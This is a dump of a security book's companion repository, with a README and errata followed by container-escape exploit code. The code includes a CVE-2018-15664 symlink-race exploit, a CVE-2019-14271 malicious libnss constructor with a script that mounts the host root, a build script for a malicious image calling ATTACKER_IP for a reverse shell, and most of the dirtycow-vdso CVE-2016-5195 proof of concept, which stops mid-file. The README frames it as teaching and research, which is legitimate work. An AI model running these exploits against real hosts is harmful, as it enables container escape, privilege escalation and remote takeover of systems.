Repository: brant-ruan/cloud-native-security-book
Branch: main
Commit: 473a5642e953
Files: 49
Total size: 125.3 KB
Directory structure:
gitextract_faxozo3s/
├── README.md
└── code/
├── 0302-开发侧攻击/
│ ├── 02-CVE-2018-15664/
│ │ └── symlink_race/
│ │ ├── build/
│ │ │ ├── Dockerfile
│ │ │ └── symlink_swap.c
│ │ ├── run_read.sh
│ │ └── run_write.sh
│ └── 03-CVE-2019-14271/
│ ├── breakout
│ └── file-service.c
├── 0303-供应链攻击/
│ ├── 01-CVE-2019-5021-alpine/
│ │ └── Dockerfile
│ └── 02-CVE-2016-5195-malicious-image/
│ └── build.sh
├── 0304-运行时攻击/
│ ├── 01-容器逃逸/
│ │ ├── CVE-2016-5195/
│ │ │ ├── 0xdeadbeef.c
│ │ │ ├── Makefile
│ │ │ └── payload.s
│ │ ├── CVE-2019-5736/
│ │ │ └── main.go
│ │ ├── cause-core-dump.c
│ │ └── tmp-dot-x.py
│ ├── 02-安全容器逃逸/
│ │ ├── build.sh
│ │ ├── change_container_runtime.sh
│ │ ├── clean_kata.sh
│ │ ├── docker/
│ │ │ ├── Dockerfile
│ │ │ ├── attack.sh
│ │ │ ├── bash
│ │ │ └── evil_bin
│ │ ├── evil_agent_src/
│ │ │ ├── grpc.go
│ │ │ └── mount.go
│ │ ├── evil_bin.c
│ │ ├── exploit.sh
│ │ ├── get_kata_src.sh
│ │ └── install_kata.sh
│ └── 03-资源耗尽型攻击/
│ ├── exhaust_cpu.sh
│ ├── exhaust_disk.sh
│ ├── exhaust_mem.sh
│ └── exhaust_pid.sh
├── 0402-Kubernetes组件不安全配置/
│ └── deploy_escape_pod_on_remote_host.sh
├── 0403-CVE-2018-1002105/
│ ├── attacker.yaml
│ ├── cve_2018_1002105_namespace.yaml
│ ├── cve_2018_1002105_pod.yaml
│ ├── cve_2018_1002105_role.yaml
│ ├── cve_2018_1002105_role_binding.yaml
│ ├── exploit.py
│ └── test-token.csv
├── 0404-K8s拒绝服务攻击/
│ ├── CVE-2019-11253-poc.sh
│ └── CVE-2019-9512-poc.py
└── 0405-云原生网络攻击/
├── Dockerfile
├── attacker.yaml
├── build_image.sh
├── cleanup.sh
├── exploit.sh
├── k8s_dns_mitm.py
└── victim.yaml
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# Materials Repository for 《云原生安全:攻防实践与体系构建》 (Cloud Native Security: Attack-Defense Practice and Architecture)
This repository provides the supplementary materials and companion source code for the book, for interested readers to study and practice.
**All content in this repository is for teaching and research purposes only. Illegal use is strictly prohibited; violators bear the consequences!**
Related links: [Douban](https://book.douban.com/subject/35640762/) | [JD.com](https://item.jd.com/13495676.html) | [Dangdang](http://product.dangdang.com/29318802.html)
## Supplementary Reading Materials
- [100_云计算简介.pdf](appendix/100_云计算简介.pdf)
- [101_代码安全.pdf](appendix/101_代码安全.pdf)
- [200_容器技术.pdf](appendix/200_容器技术.pdf)
- [201_容器编排.pdf](appendix/201_容器编排.pdf)
- [202_微服务.pdf](appendix/202_微服务.pdf)
- [203_服务网格.pdf](appendix/203_服务网格.pdf)
- [204_DevOps.pdf](appendix/204_DevOps.pdf)
- [CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf)
- [CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf)
- [CVE-2020-8595:Istio认证绕过.pdf](appendix/CVE-2020-8595:Istio认证绕过.pdf)
- [靶机实验:综合场景下的渗透实战.pdf](appendix/靶机实验:综合场景下的渗透实战.pdf)
## Companion Source Code
|Code Directory|Description|Location in Book|
|:-|:-|:-|
|[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)|CVE-2018-15664 exploit code|Section 3.2.2|
|[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|CVE-2019-14271 exploit code|Section 3.2.3|
|[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|Example of building a vulnerable image on top of an Alpine base image affected by CVE-2019-5021|Section 3.3.1|
|[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|Example of building a malicious image that exploits CVE-2016-5195|Section 3.3.2|
|[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|Several code snippets for container escape|Section 3.4.1|
|[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|Exploit code for escaping secure (sandboxed) containers|Section 3.4.2|
|[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|Sample code for resource-exhaustion attacks|Section 3.4.3|
|[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|Commands for exploiting insecure Kubernetes configurations|Section 4.2|
|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018-1002105 exploit code|Section 4.3|
|[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|Exploit code for CVE-2019-11253 and CVE-2019-9512|Section 4.4|
|[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|Simulated network environment and sample attack code for cloud native man-in-the-middle attacks|Section 4.5|
## Sharing and Discussion
Follow the WeChat official account "绿盟科技研究通讯" (NSFOCUS Research Newsletter), where we continuously publish high-quality research on frontier topics in information security:

## Notes
Some of this source code comes from elsewhere on the Internet and is archived here for readers' convenience. These sources and their origins are:
1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race):https://seclists.org/oss-sec/2019/q2/131
2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击):https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/
3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195):https://github.com/scumjr/dirtycow-vdso
4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736):https://github.com/Frichetten/CVE-2019-5736-PoC
Licenses for the referenced projects and code are governed by the original projects.
Source code modified by the authors is not individually listed here; the book cites the sources for all such references, and interested readers can consult them.
## Errata and Clarifications
### 1st Edition, 3rd Printing
#### P56 - 3.4.1 Container Escape
See [issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9) for details.
Future printings will make the following two additions and corrections to the original text:
1. Add an explanation of why `#!/proc/self/exe` is necessary (non-dumpable -> dumpable); CVE-2016-9962 could be mentioned here.
2. Spell out the context of the attack steps, removing the ambiguity of "overwrite and shellcode execution within a single runC invocation".
Thanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. We will add these corrections in subsequent printings.
#### P44 - 3.3.1 Image Vulnerability Exploitation
See [issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8) for details.
The image-build command near the bottom of page 44 is incomplete: it omits the build context directory. The correct command is as follows (note the added trailing `.`):
```bash
docker build --network=host -t alpine:cve-2019-5021 .
```
Thanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. We will fix this in subsequent printings.
#### P42 - 3.2.3 CVE-2019-14271: Loading Untrusted Dynamic-Link Libraries
See [issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7) for details.
Thanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. To compile Glibc successfully, configure must be run before make. We will fix this in subsequent printings.
#### P42 - 3.2.3 CVE-2019-14271: Loading Untrusted Dynamic-Link Libraries
See [issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6) for details.
Thanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. The steps in the book are effective as written, but the approach proposed by [@XDTG](https://github.com/XDTG) is more natural and elegant. After verification, we are considering adopting it in subsequent printings.
### 1st Edition, 1st Printing
#### P37 - 3.2.2 CVE-2018-15664: Symlink-Exchange Vulnerability (clarification only; the original text is not wrong)
The paragraph beginning at the eighth line of the body text is hard to follow:
> The task of symlink_swap.c is to create, inside the container, a symbolic link pointing to the root directory "/", and to keep swapping the names of that symlink (passed in as a command-line argument, e.g. "/totally_safe_path") and a normal directory (e.g. "/totally_safe_path-stashed"). As a result, when docker cp is executed on the host, if "/totally_safe_path" is first checked and found to be a normal directory but has become a symlink by the time the copy operation runs, Docker will resolve the symlink on the host.
In fact, inside the container, once the name exchange via renameat2 begins, `/totally_safe_path` and `/totally_safe_path-stashed` are effectively just two strings to us, no longer bound to the symlink or the normal directory; only at the moment the swapping stops is it determined again which string refers to which (the symlink or the directory).
So in the book's sentence "As a result, when docker cp is executed on the host, if first...", the name exchange inside the container is already underway. The user (or attacker) intends to docker cp the file or directory named `/totally_safe_path` inside the container (the name means "a totally safe path"); that is the expectation, or rather the premise of this scenario. While docker cp runs, the path string `/totally_safe_path` still refers to a normal directory at the check stage, but by the time the copy operation runs, `/totally_safe_path` has been swapped to point at a symlink.
Thanks to reader @泡泡球麻麻君 for pointing this out.
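The check-versus-use window described in this erratum can be illustrated in miniature, without Docker: a path that is a normal directory at check time may already be a symlink by use time. Below is a minimal Python sketch in a temporary directory (all names are illustrative; two plain renames stand in for the atomic `renameat2(RENAME_EXCHANGE)` loop the real exploit uses):

```python
import os
import tempfile

# Sandbox: "base" plays the host filesystem root.
base = tempfile.mkdtemp()
host_flag = os.path.join(base, "w00t_w00t_im_a_flag")
with open(host_flag, "w") as f:
    f.write("HOST FILE")

path = os.path.join(base, "totally_safe_path")
stash = path + "-stashed"
os.mkdir(path)           # a normal directory...
os.symlink(base, stash)  # ...and a symlink to "/" standing by

# 1) Check phase: the path looks like a harmless directory.
assert os.path.isdir(path) and not os.path.islink(path)

# 2) The attacker swaps the two names between check and use
#    (the exploit does this atomically, in an endless loop).
os.rename(path, path + ".tmp")
os.rename(stash, path)
os.rename(path + ".tmp", stash)

# 3) Use phase: the same path string now resolves through the
#    symlink, so the "copy" reads the host-side file instead.
with open(os.path.join(path, "w00t_w00t_im_a_flag")) as f:
    print(f.read())  # -> HOST FILE
```

Because the swap runs continuously, `docker cp` only has to lose the race once for the copy to follow the symlink on the host.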
#### P85 - 4.2.1 Unauthorized Access to the Kubernetes API Server (fixed in the 3rd printing of the 1st edition)
The fourth line from the bottom of the body text is ambiguous:
> As long as the attacker is network-reachable, they can control the cluster through this port.
In fact, if only `--insecure-port=8080` is set, the service listens on `localhost` only, so a remote attacker normally cannot access it even if it is "network-reachable" at the IP level. Remote control additionally requires `--insecure-bind-address=0.0.0.0`.
"Network-reachable" was actually meant to cover two situations:
1. With `--insecure-bind-address` set, the port is directly accessible from outside, as described above;
2. The attacker can reach localhost in some way, which in turn includes:
    1. a local user leveraging the service on port 8080 to escalate privileges;
    2. reaching the localhost port remotely via techniques such as SSRF or DNS rebinding.
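For reference, the contrast above comes down to the API server's bind address. A sketch of the two flag combinations (these insecure-port flags existed in older Kubernetes releases and have since been removed; values are illustrative):

```shell
# Case 1: listens on localhost only -- reachable by local users, or
# remotely only via tricks such as SSRF / DNS rebinding that bounce
# through localhost.
kube-apiserver --insecure-port=8080

# Case 2: explicitly bound to all interfaces -- directly reachable by
# any network-adjacent attacker, with no authentication required.
kube-apiserver --insecure-port=8080 --insecure-bind-address=0.0.0.0
```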
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile
================================================
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# Build the binary.
FROM opensuse/leap
RUN zypper in -y gcc glibc-devel-static
RUN mkdir /builddir
COPY symlink_swap.c /builddir/symlink_swap.c
RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c
# Set up our malicious rootfs.
FROM opensuse/leap
ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag
ARG SYMSWAP_PATH=/totally_safe_path
RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET"
COPY --from=0 /builddir/symlink_swap /symlink_swap
ENTRYPOINT ["/symlink_swap"]
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c
================================================
/*
* Copyright (C) 2018 Aleksa Sarai
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#define usage() \
do { printf("usage: symlink_swap <symlink_path>\n"); exit(1); } while(0)
#define bail(msg) \
do { perror("symlink_swap: " msg); exit(1); } while (0)
/* No glibc wrapper for this, so wrap it ourselves. */
#define RENAME_EXCHANGE (1 << 1)
/*int renameat2(int olddirfd, const char *oldpath,
int newdirfd, const char *newpath, int flags)
{
return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);
}*/
/* usage: symlink_swap <symlink_path> */
int main(int argc, char **argv)
{
if (argc != 2)
usage();
char *symlink_path = argv[1];
char *stash_path = NULL;
if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0)
bail("create stash_path");
/* Create a dummy file at symlink_path. */
struct stat sb = {0};
if (!lstat(symlink_path, &sb)) {
int err;
if (sb.st_mode & S_IFDIR)
err = rmdir(symlink_path);
else
err = unlink(symlink_path);
if (err < 0)
bail("unlink symlink_path");
}
/*
* Now create a symlink to "/" (which will resolve to the host's root if we
* win the race) and a dummy directory at stash_path for us to swap with.
* We use a directory to remove the possibility of ENOTDIR which reduces
* the chance of us winning.
*/
if (symlink("/", symlink_path) < 0)
bail("create symlink_path");
if (mkdir(stash_path, 0755) < 0)
bail("mkdir stash_path");
/* Now we do a RENAME_EXCHANGE forever. */
for (;;) {
int err = renameat2(AT_FDCWD, symlink_path,
AT_FDCWD, stash_path, RENAME_EXCHANGE);
if (err < 0)
perror("symlink_swap: rename exchange failed");
}
return 0;
}
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
# Create our flag.
echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 000 "$SYMSWAP_TARGET"
# Build and run the malicious image.
docker build -t cyphar/symlink_swap \
--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
# Now continually try to copy the files.
idx=0
while true
do
mkdir "ex${idx}"
docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out"
idx=$(($idx + 1))
done
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
# Create our flag.
echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 0444 "$SYMSWAP_TARGET"
# Build and run the malicious image.
docker build -t cyphar/symlink_swap \
--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
echo "SUCCESS -- HOST FILE CHANGED" | tee localpath
# Now continually try to copy the files.
while true
do
docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET"
done
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/breakout
================================================
#!/bin/bash
umount /host_fs && rm -rf /host_fs
mkdir /host_fs
mount -t proc none /proc # mount the host's procfs over /proc
cd /proc/1/root # chdir to host's root
mount --bind . /host_fs # mount host root at /host_fs
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c
================================================
// content should be added into nss/nss_files/files-service.c
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
#define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"
bool is_priviliged();
__attribute__ ((constructor)) void run_at_link(void) {
char * argv_break[2];
if (!is_priviliged())
return;
rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
if (!fork()) {
// Child runs breakout
argv_break[0] = strdup("/breakout");
argv_break[1] = NULL;
execve("/breakout", argv_break, NULL);
}
else
wait(NULL); // Wait for child
return;
}
bool is_priviliged() {
FILE * proc_file = fopen("/proc/self/exe", "r");
if (proc_file != NULL) {
fclose(proc_file);
return false; // can open so /proc exists, not privileged
}
return true; // we're running in the context of docker-tar
}
================================================
FILE: code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile
================================================
FROM alpine:3.5
RUN apk add --no-cache shadow
RUN adduser -S non_root
USER non_root
================================================
FILE: code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh
================================================
#!/bin/bash
# modify ATTACKER_IP and ATTACKER_PORT before building
ATTACKER_IP=REVERSE_SHELL_IP
ATTACKER_PORT=REVERSE_SHELL_PORT
TEMP_DIR=./temp-dirtycow
set -e -x
# build ExP
sudo apt update && sudo apt install -y build-essential nasm
mkdir -p $TEMP_DIR
git clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR
cd $TEMP_DIR
make
cd ..
# build malicious image
cat << EOF > ./Dockerfile
FROM ubuntu:18.04
ADD $TEMP_DIR/0xdeadbeef /entrypoint
RUN chmod u+x /entrypoint
ENTRYPOINT ["/entrypoint", "$ATTACKER_IP:$ATTACKER_PORT"]
EOF
sudo docker build -t cve-2016-5195:v1.0 .
rm ./Dockerfile
rm -rf $TEMP_DIR
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c
================================================
/*
* CVE-2016-5195 POC
* -scumjr
*/
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <err.h>
#include <errno.h>
#include <netinet/in.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include "payload.h"
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
#define PATTERN_IP "\xde\xc0\xad\xde"
#define PATTERN_PORT "\x37\x13"
#define PATTERN_PROLOGUE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define PAYLOAD_IP INADDR_LOOPBACK
#define PAYLOAD_PORT 1234
#define LOOP 0x10000
#define VDSO_SIZE (2 * PAGE_SIZE)
#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0]))
typedef unsigned int uint32_t;
typedef unsigned long uint64_t;
struct vdso_patch {
unsigned char *patch;
unsigned char *copy;
size_t size;
void *addr;
};
struct payload_patch {
const char *name;
void *pattern;
size_t pattern_size;
void *buf;
size_t size;
};
struct prologue {
char *opcodes;
size_t size;
};
struct mem_arg {
void *vdso_addr;
bool do_patch;
bool stop;
unsigned int patch_number;
};
static char child_stack[8192];
static struct vdso_patch vdso_patch[2];
static struct prologue prologues[] = {
/* push rbp; mov rbp, rsp; lfence */
{ "\x55\x48\x89\xe5\x0f\xae\xe8", 7 },
/* push rbp; mov rbp, rsp; push r14 */
{ "\x55\x48\x89\xe5\x41\x57", 6 },
/* push rbp; mov rbp, rdi; push rbx */
{ "\x55\x48\x89\xfd\x53", 5 },
/* push rbp; mov rbp, rsp; xchg rax, rax */
{ "\x55\x48\x89\xe5\x66\x66\x90", 7 },
/* push rbp; cmp edi, 1; mov rbp, rsp */
{ "\x55\x83\xff\x01\x48\x89\xe5", 7 },
};
static int writeall(int fd, const void *buf, size_t count)
{
const char *p;
ssize_t i;
p = buf;
do {
i = write(fd, p, count);
if (i == 0) {
return -1;
} else if (i == -1) {
if (errno == EINTR)
continue;
return -1;
}
count -= i;
p += i;
} while (count > 0);
return 0;
}
static void *get_vdso_addr(void)
{
return (void *)getauxval(AT_SYSINFO_EHDR);
}
static int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n)
{
const unsigned char *s;
unsigned long value;
unsigned char *d;
d = dest;
s = src;
while (n >= sizeof(long)) {
memcpy(&value, s, sizeof(value));
if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
warn("ptrace(PTRACE_POKETEXT)");
return -1;
}
n -= sizeof(long);
d += sizeof(long);
s += sizeof(long);
}
if (n > 0) {
d -= sizeof(long) - n;
errno = 0;
value = ptrace(PTRACE_PEEKTEXT, pid, d, NULL);
if (value == -1 && errno != 0) {
warn("ptrace(PTRACE_PEEKTEXT)");
return -1;
}
memcpy((unsigned char *)&value + sizeof(value) - n, s, n);
if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
warn("ptrace(PTRACE_POKETEXT)");
return -1;
}
}
return 0;
}
static int patch_payload_helper(struct payload_patch *pp)
{
unsigned char *p;
p = memmem(payload, payload_len, pp->pattern, pp->pattern_size);
if (p == NULL) {
fprintf(stderr, "[-] failed to patch payload's %s\n", pp->name);
return -1;
}
memcpy(p, pp->buf, pp->size);
p = memmem(payload, payload_len, pp->pattern, pp->pattern_size);
if (p != NULL) {
fprintf(stderr,
"[-] payload's %s pattern was found several times\n",
pp->name);
return -1;
}
return 0;
}
/*
* A few bytes of the payload must be patched: prologue, ip, and port.
*/
static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)
{
int i;
struct payload_patch payload_patch[] = {
{ "port", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) },
{ "ip", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) },
{ "prologue", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size },
};
for (i = 0; i < ARRAY_SIZE(payload_patch); i++) {
if (patch_payload_helper(&payload_patch[i]) == -1)
return -1;
}
return 0;
}
/* make a copy of vDSO to restore it later */
static int save_orig_vdso(void)
{
struct vdso_patch *p;
int i;
for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {
p = &vdso_patch[i];
p->copy = malloc(p->size);
if (p->copy == NULL) {
warn("malloc");
return -1;
}
memcpy(p->copy, p->addr, p->size);
}
return 0;
}
static int build_vdso_patch(void *vdso_addr, struct prologue *prologue)
{
uint32_t clock_gettime_offset, target;
unsigned long clock_gettime_addr;
unsigned char *p, *buf;
uint64_t entry_point;
int i;
/* e_entry */
p = vdso_addr;
entry_point = *(uint64_t *)(p + 0x18);
clock_gettime_offset = (uint32_t)entry_point & 0xfff;
clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;
/* patch #1: put payload at the end of vdso */
vdso_patch[0].patch = payload;
vdso_patch[0].size = payload_len;
vdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len;
p = vdso_patch[0].addr;
for (i = 0; i < payload_len; i++) {
if (p[i] != '\x00') {
fprintf(stderr, "failed to find a place for the payload\n");
return -1;
}
}
/* patch #2: hijack clock_gettime prologue */
buf = malloc(sizeof(PATTERN_PROLOGUE)-1);
if (buf == NULL) {
warn("malloc");
return -1;
}
/* craft call to payload */
target = VDSO_SIZE - payload_len - clock_gettime_offset;
memset(buf, '\x90', sizeof(PATTERN_PROLOGUE)-1);
buf[0] = '\xe8';
*(uint32_t *)&buf[1] = target - 5;
vdso_patch[1].patch = buf;
vdso_patch[1].size = prologue->size;
vdso_patch[1].addr = (unsigned char *)clock_gettime_addr;
save_orig_vdso();
return 0;
}
static int backdoor_vdso(pid_t pid, unsigned int patch_number)
{
struct vdso_patch *p;
p = &vdso_patch[patch_number];
return ptrace_memcpy(pid, p->addr, p->patch, p->size);
}
static int restore_vdso(pid_t pid, unsigned int patch_number)
{
struct vdso_patch *p;
p = &vdso_patch[patch_number];
return ptrace_memcpy(pid, p->addr, p->copy, p->size);
}
/*
* Check if vDSO is entirely patched. This function is executed in a different
* memory space thanks to fork(). Return 0 on success, 1 otherwise.
*/
static void check(struct mem_arg *arg)
{
struct vdso_patch *p;
void *src;
int i, ret;
p = &vdso_patch[arg->patch_number];
src = arg->do_patch ? p->patch : p->copy;
ret = 1;
for (i = 0; i < LOOP; i++) {
if (memcmp(p->addr, src, p->size) == 0) {
ret = 0;
break;
}
usleep(100);
}
exit(ret);
}
static void *madviseThread(void *arg_)
{
struct mem_arg *arg;
arg = (struct mem_arg *)arg_;
while (!arg->stop) {
if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) {
warn("madvise");
break;
}
}
return NULL;
}
static int debuggee(void *arg_)
{
if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1)
err(1, "prctl(PR_SET_PDEATHSIG)");
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
err(1, "ptrace(PTRACE_TRACEME)");
kill(getpid(), SIGSTOP);
return 0;
}
/* use ptrace to write to read-only mappings */
static void *ptrace_thread(void *arg_)
{
int flags, ret2, status;
struct mem_arg *arg;
pid_t pid;
void *ret;
arg = (struct mem_arg *)arg_;
flags = CLONE_VM|CLONE_PTRACE;
pid = clone(debuggee, child_stack + sizeof(child_stack) - 8, flags, arg);
if (pid == -1) {
warn("clone");
return NULL;
}
if (waitpid(pid, &status, __WALL) == -1) {
warn("waitpid");
return NULL;
}
ret = NULL;
while (!arg->stop) {
if (arg->do_patch)
ret2 = backdoor_vdso(pid, arg->patch_number);
else
ret2 = restore_vdso(pid, arg->patch_number);
if (ret2 == -1) {
ret = NULL;
break;
}
}
if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1)
warn("ptrace(PTRACE_CONT)");
if (waitpid(pid, NULL, __WALL) == -1)
warn("waitpid");
return ret;
}
static int exploit_helper(struct mem_arg *arg)
{
pthread_t pth1, pth2;
int ret, status;
pid_t pid;
fprintf(stderr, "[*] %s: patch %d/%ld\n",
arg->do_patch ? "exploit" : "restore",
arg->patch_number + 1,
ARRAY_SIZE(vdso_patch));
/* run "check" in a different memory space */
pid = fork();
if (pid == -1) {
warn("fork");
return -1;
} else if (pid == 0) {
check(arg);
}
arg->stop = false;
pthread_create(&pth1, NULL, madviseThread, arg);
pthread_create(&pth2, NULL, ptrace_thread, arg);
/* wait for "check" process */
if (waitpid(pid, &status, 0) == -1) {
warn("waitpid");
return -1;
}
/* tell the 2 threads to stop and wait for them */
arg->stop = true;
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
/* check result */
ret = WIFEXITED(status) ? WEXITSTATUS(status) : -1;
if (ret == 0) {
fprintf(stderr, "[*] vdso successfully %s\n",
arg->do_patch ? "backdoored" : "restored");
} else {
fprintf(stderr, "[-] failed to win race condition...\n");
}
